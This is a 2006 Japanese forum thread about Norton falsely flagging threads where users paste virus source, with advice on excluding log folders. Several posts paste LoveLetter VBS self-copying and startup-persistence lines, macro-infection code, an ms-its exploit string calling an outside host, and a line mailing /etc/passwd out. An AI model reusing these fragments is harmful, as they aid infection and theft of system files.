ノートンがvbsウィル ..
534:ひよこ名無しさん
06/05/13 05:26:57 w+9rO7hg
, -'"´  ̄`丶、_
,.∩ `ヽ
〃∪'´ ̄`二二人\ ヽ
| ツ´ ̄ ̄ ̄ ̄´ ヾ ヽ. ',
|ハ ,ニ、 ,. - 、 | | | l |
| ハ ィハ ,二ヽ. | | | | | 同じ板にコピペするとそのままだけど、
| | | じ' |トJ〉 /)} l | 違う板にコピペすると鬼のような怖い顔
| ハ 、'_,  ̄,, 厶イ川| に変わる摩訶不思議な佳子様コピペ。
l l /\ .. イV\川 |
,' l l ,イ `l ̄´ / /ヽl l
l | l ハ `メ、 〃 ヽヽ、__ノ
l ∨ └‐イ「ト--ァ'´ ハヽ__ノ
ヽ/ } l」」 / / }`ー
〈_n| 八 / / /ノ
〈二二人 c /\/ / , イ
/ /厂 /\__>< {_
535:ひよこ名無しさん
06/05/13 09:57:56
, -'"´  ̄`丶、_
,.∩ `ヽ
〃∪'´ ̄`二二人\ ヽ
| ツ´ ̄ ̄ ̄ ̄´ ヾ ヽ. ',
|ハ ,ニ、 ,. - 、 | | | l |
| ハ ィハ ,二ヽ. | | | | | 同じ板にコピペするとそのままだけど、
| | | じ' |トJ〉 /)} l | 違う板にコピペすると鬼のような怖い顔
| ハ 、'_,  ̄,, 厶イ川| に変わる摩訶不思議な佳子様コピペ。
l l /\ .. イV\川 |
,' l l ,イ `l ̄´ / /ヽl l
l | l ハ `メ、 〃 ヽヽ、__ノ
l ∨ └‐イ「ト--ァ'´ ハヽ__ノ
ヽ/ } l」」 / / }`ー
〈_n| 八 / / /ノ
〈二二人 c /\/ / , イ
/ /厂 /\__>< {_
536:ひよこ名無しさん
06/05/15 14:24:13
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
537:ひよこ名無しさん
06/05/19 20:06:44
保守age
538:ひよこ名無しさん
06/05/24 01:38:47 uOt5d8a9
Live2ch使ってます
NAV2003のAutoと手動の各除外にLive2chのログフォルダを指定してますが
このスレを表示すると、「VBS.LoveLetter.Var」の表示が出ます。
もちろんスレは見れない状態です。
どうすれば回避できますか?
539:ひよこ名無しさん
06/05/24 01:40:06
___
/ \ ________
/ ´` \ /
| ・ ・ | <おい糞元祖ぶる殿 ◆U/gDqFZzsY.急ぎでラーク買うて来い
| (● ●) | \________
\ ⊂ニ⊃ ノ
\ ⊂ニ⊃
 ̄ ̄ ̄
540:ぴーこ名無しさん
06/05/24 02:15:51
>>538
スレリンク(software板:12番)
ログフォルダの指定を今一度確認してください。
以下の方法でウイルスの検出された場所がわかります。
検出先が2ちゃんねるブラウザのログフォルダに含まれていることを確認してね。
URLリンク(service1.symantec.com)
Norton AntiVirus を起動し、[レポート] を選択する。
「活動ログ」 の右側に表示されているボタン、[レポートの表示] をクリックする。
541:538
06/05/24 02:24:00
>>540
グミクズがさっさと教えろや
542:538
06/05/24 03:34:43 uOt5d8a9
>>540
レスありがとうございます。
ログフォルダの指定は合っていました。
ウィルスの検出場所は、Live2ch\temp.htm、という所です。
このHTMLファイルをNAVの除外に設定すればいいんですかね?
それとも止めといたほうがいいですか?(このファイルを削除しても意味無しですよね)
よろしければレスお願いします。
>>541
ID隠して騙りは止めてね
543:538
06/05/24 03:39:57 uOt5d8a9
>>540
言い忘れました、ちなみに
Live2ch\temp.htmはログフォルダの外にあるファイルです。
544:ぴーこ名無しさん
06/05/24 04:07:14
>>542-543
こちらでも確認しました。
Live2chのスレビューはdatをtemp.htmに通して表示するので反応しているようです。
temp.htmを除外に加えたら正常に表示されました。
注意点はウイルスコードをhtmlに埋め込むことになるのでtemp.htmをIEなどのwebブラウザでは開かないでください。
また、2ちゃんねるブラウザの脆弱性を突いたウイルスコードも出る可能性もありますのでノートン本スレや
お使いの2ちゃんねるブラウザのスレを見るようにしてください。
545:ぴーこ名無しさん
06/05/24 04:18:41
>>544追記
Live2chのfaqが過去ログにありました。>>84 orz.......
参考に
スレリンク(software板:484-番)n dat落ち
URLリンク(220.254.5.211:8000) ミラー
546:538
06/05/24 04:40:48 uOt5d8a9
>>545
わざわざ再現までしていただき(しかもこんな夜中に)すみません。。。
temp.htmを除外に加えたら、無事このスレもLive2chで見る事が出来ました。
ありがとうございます!
しかも、過去ログまで探してくれたんですね、、、ありがとうございます。
547:ひよこ名無しさん
06/05/24 04:47:04
>>546
俺も暇だからよー
548:ひよこ名無しさん
06/05/24 13:46:43
>>546
俺も暇だからよー
549:cen ◆Am9xOgNMYE
06/05/30 02:32:01 BE:137160162-
こんばんは。
>>17のソフトですが、対応するスクリプトを増やしました。
それから、検索の途中で中止できるようにしました。
550:cen ◆Am9xOgNMYE
06/05/30 02:32:51 BE:114300252-
忘れてました。
こちらです。
URLリンク(www.geocities.jp)
551:ひよこ名無しさん
06/05/31 22:57:19
bbs.cgiが更新されて>>4のような置換がちゃんと行われるようになった模様です
今後はウィルスコード貼っても反応しなくなるのかな
552:ひよこ名無しさん
06/06/01 00:54:09
ダメですた
スレリンク(mnewsplus板:66番)
>>4は完全に嘘であることが判明したので
次スレから削除かな
削除するだけだと「親切にも」追記する人が現れかねないから
別のテンプレに差し替えた方がいいかな
553:cen ◆Am9xOgNMYE
06/06/01 01:06:54
>>552
>>4の置換で反応しないものもありますが、反応するものも
あります。完全に嘘というわけではないです。
554:ひよこ名無しさん
06/06/01 01:23:16
どっちにしろ置換するようになったんだから>>4は大幅書き換えが必要
555:cen ◆Am9xOgNMYE
06/06/02 01:25:51
こんばんは。
>>17のソフトですが、フォルダの設定によって検索できない場合
がありましたので、修正しました。
URLリンク(www.geocities.jp)
556:ぴーこ名無しさん
06/06/02 02:28:30
>>4のテンプレ案です。
単純に文字参照を抜いてみました。
ノートンが反応するのは、ここの掲示板(2ちゃんねる)の仕様です。
ここは、時に他のウィルス対策ソフトが反応する場合もあります。
断言できることは、他のWebページでノートンが反応した場合は要注意ということ。
尚、ここはウイルス鑑定スレではありません。
危ないと思ったURLはラウンジ板等の”勇気が無くて見られない画像解説スレ”で診てもらいましょう。
URLリンク(find.2ch.net)
■関連
ノートントラップ
URLリンク(ansitu.xrea.jp)
ノートンインターネットセキュリティ@2ちゃんねる検索
URLリンク(find.2ch.net)
557:ひよこ名無しさん
06/06/02 04:54:27
>>556
Q. 2chが文字を置換しないのが悪いって聞いたんだけど
A. 情報が古いと思われます。2006年6月から置換するようになりましたが、
問題の文字を使わなくてもノートンが誤検出する文字列は作れるので
相変わらず反応する場合があります。
↑とか追加した方がいい。単に消すと
> 「親切にも」追記する人が現れかねないから
を防げない。
558:ぴーこ名無しさん
06/06/03 22:00:18
Q. 2ちゃんねるが文字を置換しないのが悪いって聞いたんだけど
A. 2006年6月から置換するようになりましたが、
ノートンが誤検出する置換できないウィルスコードがあるので反応します。
ノートンがウイルスソースに誤反応の補足
URLリンク(ansitu.xrea.jp)
ノートンが反応するのは、ここの掲示板(2ちゃんねる)の仕様です。
ここは、時に他のウィルス対策ソフトが反応する場合もあります。
断言できることは、他のWebページでノートンが反応した場合は要注意ということ。
尚、ここはウイルス鑑定スレではありません。
危ないと思ったURLはラウンジ板等の”勇気が無くて見られない画像解説スレ”で診てもらいましょう。
URLリンク(find.2ch.net)
■関連
ノートントラップ
URLリンク(ansitu.xrea.jp)
ノートンインターネットセキュリティ@2ちゃんねる検索
URLリンク(find.2ch.net)
>>557
ノシシ
以前の説明をwikiに誘導する形にしてみました。
559:ひよこ名無しさん
06/06/04 10:03:06
u
560:ひよこ名無しさん
06/06/04 10:27:58
保守
561:ひよこ名無しさん
06/06/05 19:23:06
jane doe view使ってるんですが、
ノートントラップのウィルスコード貼られたスレ取得障害になったり、
ここのPC初心者板なんかはノートン切らないと来れません。
それで対策として書かれてる見て、
ノートンアンチウィルスの手動&オートの除外項目から、
viewのLogsフォルダを両方除外したんですが、
それでも駄目なままです。
他に何をしないといけないんでしょうか?
562:ひよこ名無しさん
06/06/05 19:44:30
ここを読み直せ
563:ひよこ名無しさん
06/06/06 18:14:41 yssu6HWa
ウィルスコードに反応したせいで、取得したログが消滅するのについては、
ログフォルダを除外すればいけるわけですが、
最近のウィルスコードは進化してて、
Autoblockで侵入感知反応してしまって、
2chの該当IPをアク禁にしてしまってるようなんです。
この場合の対応はどのようにすればよいでしょうか?
ノートン切らないと、ログを取得するどころか、
スレ単位、はなはだしくは板単位でアクセスすらできません。
564:ひよこ名無しさん
06/06/06 18:17:44
>>563
リカバリしろデブ。
565:ひよこ名無しさん
06/06/06 18:30:21
どの専ブラでも基本はログと書き込みフォルダを
除外すればおk?
566:ぴーこ名無しさん
06/06/07 01:17:37
>>563
URLリンク(mickey.mirv.net)
>>565
URLリンク(ansitu.xrea.jp) の3番目
詳しくはお使いの2ちゃんねるブラウザのヘルプ・スレ等で確認してください。
567:ひよこ名無しさん
06/06/07 18:58:51
>>564
リカバリしろデブ。
568:<body onload=window()>
06/06/08 03:34:49
p + w * 10 <br> End Sub <br>
LOVE-LETTER-FOR-YOU
569:ひよこ名無しさん
06/06/08 03:36:10
>568
570:ひよこ名無しさん
06/06/08 04:18:57
さっきこのウィルスソースが2ちゃん掲示板に埋められてるのを見てしまったら、
ウィルスソフトは反応しなかったのですが、
いきなり2ちゃん掲示板の行間が広くなってしまいました。
ネットから接続を切って履歴とかTemporaryInternetFileとか全部削除してから
ウィルスチェックをしましたが反応なし。
これはブラウザの表示は変になったけど感染はしなかったということで大丈夫なのでしょうか?
ブラウザは専ブラじゃなくIEで、ウィルスソフトはソースネクストのウィルスセキュリティです。
571:ひよこ名無しさん
06/06/08 04:21:40
570ですが補足です。
表示したスレは
スレリンク(newsplus板)l50
で、ここの>>5にそのソースが書いてありました。
572:ひよこ名無しさん
06/06/08 04:23:53
>>570
行間が広くなるのはシリア語ブラクラじゃないのか?
573:ひよこ名無しさん
06/06/08 04:27:58
>>571
5の最後の行にシリア語書いてあるね
574:ひよこ名無しさん
06/06/08 04:48:56
>>572-573
レスありがとうございます。
シリア語ブラクラだと行間が広くなる以外の被害はないですか?
初めて聞いたもので>シリア語ブラクラ
さきほど念のためもう一度ウィルスチェックしましたがウィルス発見なしでした。
ブラウザと閉じるときにInternetTemporaryFileの中身を削除する設定にしてあるのですが
こちらも念のためInternetTemporaryFileの中身も確認してみましたが
cookieファイルとfaviconファイルのみ格納されていました。
「html」「htm」がなくなってれば大丈夫ですかね?
575:ひよこ名無しさん
06/06/08 05:11:57
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
| ○。 |
ノノ) 从
( i从〓〓 〓〓.从
.从-=・=- -=・=-从
从从. l 从)
(从.l∴ ∨ ∴从人)
(人人|∴ ヽ .ー===-' ./.∴..从人) <無職元祖ぶる殿 ◆U/gDqFZzsY蚤
(人人|∴∴!  ̄ !∴∴l从人)
(人人|∴∴!. !∴∴l从人)
(人人|∴∴!. !∴∴l从人)
..(人人人_人____人_.人人人)
〔ノ二二,___ __,二二ヽ〕
|:::::::::::::::::::::::::ヽ゜ ゜/:::::::::::::::::::::::::/
〉::::::::: :::::::::::::〉__∩__〈:::::::::::::: ::::::::〈
|:::::::::::::::::::::::/\ ̄/ヽ:::::::::::::::::::::/
〔:::::::::::::::::::::/ ノ ~ヽ ヽ::::::::::::::::::|
ヽ:::::::::::::::::/ /:::::::::::: \ ):::::::::::::::::::ゝ
ノ:::::::::::::::::::| |_〜─ー= - | |〜〜〜/
576:ひよこ名無しさん
06/06/12 11:39:57
このスレだと反応しないのは何で?
577:ひよこ名無しさん
06/06/13 14:13:25
特定のスレに擬似ウィルスコード貼り付ける奴がいて困ってます。
ノートンのauto protect と手動スキャンで、
専ブラを除外するように設定してるんですが、スレを開くとエラーになってしまいます。
URLリンク(ansitu.xrea.jp)
このサイトに書かれてる、信頼のアドレスを追加の設定はしました。
エラーのログを取得して、弾かれて、
有志さんの誤反応無効化スクリプトで書き換えて、
時間たつのまってから閲覧。しかもレス番はズレでわけわかめ
という状態です。
何かうまく弾く方法はないんでしょうか?
578:ひよこ名無しさん
06/06/13 20:49:00
>>577
きちんと専ブラのログを除外する
579:577
06/06/14 13:32:40
>>578
僕の分かるように1〜10までしっかりすべてと教えて下さい。
さっさと、教えろボケこのやろう
∧_∧
,,,,,,,,,,,,,,,∧,,∧ ( ´∀`) \
〜′,,,,,,,,,,ミ,,゚Д゚彡 / つ℃━━━━━━
UU""""U U 〜(_つ つ \へへ_ |
――――――――| . |
| |
|へ__ . |
| |
へ____へ__/___へへ__へ______ |
|
| |
(( | ))
| |
| |
|
|〜〜〜ヽ`∀´>ヾ〕∈
580:ひよこ名無しさん
06/06/17 22:54:14
>>2ё
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!URLリンク(www.loadcash.biz) type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???
581:ひよこ名無しさん
06/06/18 17:52:54 k4PxNBCi
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!URLリンク(www.loadcash.biz) type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1))
582:ひよこ名無しさん
06/06/18 18:33:56
583:ひよこ名無しさん
06/06/20 00:04:58
時々スレを転々としてると、急に変な改行になるんですが(文と文の隙間が全部空いてしまう)
これってウイルスに侵されてるのでしょうか?
584:ひよこ名無しさん
06/06/20 01:18:31
l'vヘ
ハ ┌( ;/ ト, ,、 rヘ r'^ナrジ-z
__}ヽ,__ (ヽ/ス_r^フしz,り い)n/イr〜^′
'っヾ、r'__ |レ'ノ_C'入彳勺ソメろ_j/し-,_
`フ ヾ勹_| <_r' !|刀_」r''>||/⌒(_rヘ-‐'
<_ゝし||フぅ(ひzメ__ゝ'l !'そ
~zヾ|て 、l レ^ //'| |'~
| | ヽl| // }|
| :! || | | ,/ ,'
| :{. || | |/ / すいません、ちょっと通りますよ・・・
l !|| | | /
ヽ ヽ.|/ //
_,r)_ j (_,( ciz
,ノこ_- __,ーヽ ん|Zゥ レz zjそ_
} ... 丿 ろ、,_!|乙7ムLそ/し-z
ノ""'' 一( `う.l !シ/ア了//_⊂,
/、__ ヽ ^'| |~//,/_ソ ハr^
/ ...... ーl | |// //ノ
/~"' 、__/ ,,,...} |/ /// _Jv ,、 _,、
{' _ `y′ 一 / r'〜(_ノ z'jく|!ぞぅンそ
人 =/‐- ハ 丿" ''( ぅY||/ソ'/`′
ヽ '' / __,, / / ‐- ''') | レ'//
'∨ X. }''' ....ノ ノムxく
j ー/ /== ノ'ヽ rご ー(
/=‐ r'´-ヽ } ー/'''' { ,ノ'' y' ...)
,' _,, 人 ''"`、 ノ.. '' ノ`ヽ ''"ヽ / ー人.... (
{ー / \ -'} / / \'''}` ('' ィ´ \_ヽ
ハ 〈 )八 ( f )ハ. )ノ _)ノ
ヽ ) (( )ノ / ー'′
585:dirsystem&"\MSKernel32.vbs
06/06/20 01:55:47
>>568
586:あぼ〜ん
06/06/20 01:56:38
>>568 >>585
587:ひよこ名無しさん
06/06/20 02:15:03
>>583
シリア語ブラクラ
これを使うといい。
URLリンク(www.geocities.jp)
588:ひよこ名無しさん
06/06/20 23:24:54
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!URLリンク(www.loadcash.biz) type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1))
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
589:ひよこ名無しさん
06/06/21 12:18:24 nQsDrOZ+
このスレに貼ってあるソースは大丈夫なのですか?
例えば>>580-581とか、>>588とか…
このスレだと反応ないんですが、何か特別なのでしょうか?
590:ひよこ名無しさん
06/06/21 14:23:42 fhcCUte2
テスト
591:ひよこ名無しさん
06/06/21 20:24:45
>>589
心配しすぎだと思うんです(><)
これが動いたら2chは大騒ぎになっちゃうと思うんです(><)
592:ひよこ名無しさん。
06/06/21 23:50:37
NGワードあぼ〜んすればおk
593:ひよこ名無しさん
06/06/22 20:26:16 l9A+tZtH
誘導されてきました
導入しているマカフィーでスキャンかけても何の反応もなかったんですが、
ノートンのオンラインスキャンやってみると
感染ファイルが二個みつかって
C:\Program Files\gikoNavi\Log\2ch\aasaloon\Folder.idx は Bloodhound.Exploit.6 に感染しています。
C:\Program Files\gikoNavi\Log\2ch\aasaloon\subject.txt は Bloodhound.Exploit.6 に感染しています。
と言う表示が出ました。
これは危険なんでしょうか。それともただのウィルスコード?
594:ひよこ名無しさん
06/06/22 20:27:57
>>593
ただのウィルスコード
これで消せる。
URLリンク(www.geocities.jp)
595:ひよこ名無しさん
06/06/22 20:28:13
>>593
ノートンがvbsウィルスのソースに誤反応3
スレリンク(pcqa板)
596:ひよこ名無しさん
06/06/22 20:28:47
>>594
cen乙
597:ひよこ名無しさん
06/06/22 20:30:04
>>594-596
レス早いなw
598:ひよこ名無しさん
06/06/22 20:41:25
粘着してリロードしながら監視してるんだろ?www
599:ひよこ名無しさん
06/06/22 20:44:02 l9A+tZtH
>>594
ありがとうございます。
見分けるコツみたいなものはあるんですか?
600:ひよこ名無しさん
06/06/22 22:08:53
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!URLリンク(www.loadcash.biz) type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
601:ひよこ名無しさん
06/06/23 00:17:41
ノートンがvbsウィルスのソースに誤反応3
スレリンク(pcqa板)
テンプレにでも入れるか・・・?
脳豚使うなら自力で何とかしろよ・・・
602:ひよこ名無しさん
06/06/23 00:18:16
誤爆
603:ひよこ名無しさん
06/06/23 18:23:08
___ゲームキャラ板でもモニカワイイモニカ様___
スレリンク(gamechara板)
このスレを開くと閲覧できないどころか
一回再起動しないとgame10鯖に繋がらなくなる障害が出るんですが
NGコードとかどう打って対処すればいいのですか?
604:ひよこ名無しさん
06/06/23 18:23:47 6hQn7KgH
使用2chブラウザは Jane Doe Styleです。
605:ひよこ名無しさん
06/06/23 18:25:27
>>604
回答めんどいからこのスレ内検索して
606:ひよこ名無しさん
06/06/23 22:47:16
>>599
専用ブラウザでスレを取得した「だけ」で反応したら間違いなく誤反応なので心配無用。
スレに貼られたURLをクリックして反応したならウィルスの疑いあり。
てゆーか、やたらとクリックしちゃダメ。
607:ひよこ名無しさん
06/06/28 16:58:31
age
608:ひよこ名無しさん
06/06/29 15:09:12 C6iUe2mV
Your attention,Please. みなさまに申し上げます
fire drill 火災避難訓練
609:ひよこ名無しさん
06/06/29 19:41:48
age
610:ひよこ名無しさん
06/06/29 21:38:29
スレリンク(pcqa板:111-番)
111 名前:ひよこ名無しさん 投稿日:2006/06/29(木) 21:33:23 ID:P5JFBD43
キャップもらってパスワードもらって、名前欄に書き込んでも、
○★ にならなくて○◆になってしまうんですが、どうしてでしょうか
113 名前:愛新覚羅 ◆WjkbiI..A2 投稿日:2006/06/29(木) 21:34:04 ID:???
>>111
ウイルシかな
611:ひよこ名無しさん
06/06/30 22:56:15 2Lq/lYYu
テスト
612:ひよこ名無しさん
06/07/01 00:07:11 Dt6nkhA2
スレリンク(arc板:16番)
コレって書き込んだ本人がウイルスに感染しているって事でしょうか?
613:ひよこ名無しさん
06/07/01 00:08:55
>>612
ノートン先生を誤反応させるためにわざと貼ってるんだよ
614:612
06/07/01 00:39:41 Dt6nkhA2
ただ、これ書いた人がカードゲームのトレードスレに
自分のメルアド出してブログバレしてます
615:ひよこ名無しさん
06/07/01 23:18:07
複雑な自爆では?
616:ひよこ名無しさん
06/07/02 19:36:03 ytfN9V0/
ノートン2006でAutoprotectの設定で、ログのフォルダを除外したいのですが、
それらしい項目が分かりません。
Norton AntiVirusオプションの項目ではないのでしょうか?
617:ひよこ名無しさん
06/07/02 20:00:00 ytfN9V0/
事故解決しました。
618:ひよこ名無しさん
06/07/03 19:55:32 pfnK+d5L
専ブラ(Jane)での書き込みの妨害も先生の仕業?
更新かけて解決するのであれば(期限切れ)、
してやらんでもないのだが・・・。
619:ひよこ名無しさん
06/07/03 22:30:42
>>618
> 更新かけて解決するのであれば(期限切れ)、
それはないな。FW(が入っているのであれば)一時的に切ってみるしか
620:618
06/07/03 23:15:21 pfnK+d5L
>>619
いや、プラウザからなら書き込めるんですよ。
ノートン有効→一部の板の閲覧不可(IE、専ブラ共に)
無効→共に閲覧は可能 専ブラでの書き込みが不可。
ってわけでこの板だけは、IEからしか書き込めないんです・・・。
まぁ、通信を許可すれば解決なんでしょうが・・・。
いろいろやってみます。 どもでした。
621:ひよこ名無しさん
06/07/04 02:40:17
まったくの初心者ですが
ノートンインターネットセキュリティー2006での誤反応対策を教えてください
既出でしたらアンカーでもいいのでお願いします
622:ひよこ名無しさん
06/07/04 08:28:52
>>621
>>1->>620を読め
623:ひよこ名無しさん
06/07/04 10:11:31
「まったくの初心者」
だからどうした?このスレを100回読んで知識増やせ。
624:ひよこ名無しさん
06/07/04 20:16:10 Bwi55Fwo
スレを開いたら突然ウィルスに感染したんですがurlを直接踏まなくても
感染するウィルスはあるんですか?
625:ひよこ名無しさん
06/07/05 11:14:56
>>624
>>1->>620を読め
626:ひよこ名無しさん
06/07/05 17:10:28 xPsQC9iJ
, --- 、_
/ミミミヾヾヽ、_
∠ヾヾヾヾヾヾjj┴彡ニヽ
/ , -ー‐'"´´´ ヾ.三ヽ
,' / ヾ三ヽ
j | / }ミ i
| | / /ミ !
} | r、 l ゙iミ __」
|]ムヽ、_ __∠二、__,ィ|/ ィ }
|  ̄`ミl==r'´ / |lぅ lj 私が原田ウィルス作者ですが何か?
「!ヽ、_×___j ヽ、× -' レ'r'/
`! j ヽ j_ノ
', ヽァ_ '┘ ,i
ヽ ___'...__ i ハ__
ヽ ゙二二 ` ,' // 八
ヽ /'´ / ヽ
|ヽ、__, '´ / / \
627:ひよこ名無しさん
06/07/07 03:17:23
>>577
遅レスだけど一応。
URLリンク(mickey.mirv.net)
↑みて最新のアドレス設定しる
628:ひよこ名無しさん
06/07/15 01:31:41 668g3rrq
こんなPCはネットにつなぐな! 3日間放置した無防備PCの結末は?
URLリンク(arena.nikkeibp.co.jp)
以下すべて日本語対応で無料。
ブラウザ:Firefox URLリンク(www.mozilla-japan.org)
メーラー:Thunderbird URLリンク(www.mozilla-japan.org)
上記2種の拡張(URLリンク(beau.g-com.ne.jp))
スパイウェア対策:URLリンク(www.geocities.jp)
ウィルス対策:avast! URLリンク(www.forest.impress.co.jp)
適当なルーター:BUFFALO BBR-4HG URLリンク(netspeed.studio-radish.com)
無料のウイルス対策ソフトなどのセキュリティソフト一覧
URLリンク(www.geocities.co.jp)
セキュリティ板
URLリンク(pc8.2ch.net)
629:ひよこ名無しさん
06/07/23 19:35:23 XNQAeCHC
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!URLリンク(www.loadcash.biz) type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1))
630:ひよこ名無しさん
06/07/24 00:49:37
できれば既出のものじゃなくて
新しいの一行づつ張ってほしいなぁ。
631:ひよこ名無しさん
06/07/29 23:32:33
2CH自体、5月からはじめました。
ノートンがなんだかよくわかりませんが、ある掲示板で症状を書き込んだところ
ノートン先生かといわれました。
症状としては、かんじなどを変換すると候補がでますが、するとその時点でIEが
強制終了してしまいます。
2CHはIEでみています。最初から。
これ、直るのでしょうか?
パソコン使えないとネットで就職活動もできず困っています。
どうかよろしくお願いします。
632:ひよこ名無しさん
06/07/29 23:59:23
このスレとは関係ないような・・・
633:ひよこ名無しさん
06/07/30 00:06:37
>>631
ですけど、感染したときにLOVE-LETTERなんとかというものが画面に表示されました。
そのときなんだかわからなかったので、続行のボタンを押しました。
漢字を変換するとIEが落ちてしまうので、最初に出てきた感じで該当するものが泣ければ
そのままにしています。
なんとかならないでしょうか。
634:ひよこ名無しさん
06/07/30 00:40:34
ここはウイルス対策ソフトの「誤反応」のスレです。
ウイルスにほんとに感染してる件ならスレ違い
635:ひよこ名無しさん
06/07/30 03:56:39
>>633
よく分からないならクリーンインストールしろ。
それも出来ないなら就職浪人決定。
636:ひよこ名無しさん
06/07/30 19:55:34
クリーンインストールってなに?
637:ひよこ名無しさん
06/07/30 20:12:01
おまえの頭を入れ替えること
638:ひよこ名無しさん
